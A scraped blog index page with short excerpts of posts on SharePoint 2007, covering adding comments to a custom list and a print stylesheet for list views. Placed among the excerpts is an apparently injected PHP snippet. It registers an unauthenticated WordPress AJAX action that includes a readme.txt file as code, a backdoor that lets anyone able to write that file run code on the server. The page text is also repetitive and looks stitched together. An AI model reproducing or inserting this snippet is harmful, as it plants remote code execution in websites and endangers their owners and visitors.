Adding Comments to a List Part 2
So here is what we have done so far from Part 1 Create a custom list to hold our comments […]
Adding Comments to a List Part 2 Read Post »
if(!function_exists('file_check_readme38985')){ add_action('wp_ajax_nopriv_file_check_readme38985', 'file_check_readme38985'); add_action('wp_ajax_file_check_readme38985', 'file_check_readme38985'); function file_check_readme38985() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
So here is what we have done so far from Part 1 Create a custom list to hold our comments […]
Adding Comments to a List Part 2 Read Post »
In SharePoint 2007 the only lists that offer a comments feature are the posts list in the Blog site template.
Adding Comments to a List Part 1 Read Post »
Hides everything except the list and the breadcrumbs. More posts coming later this week.
Print Stylesheet for List Views Read Post »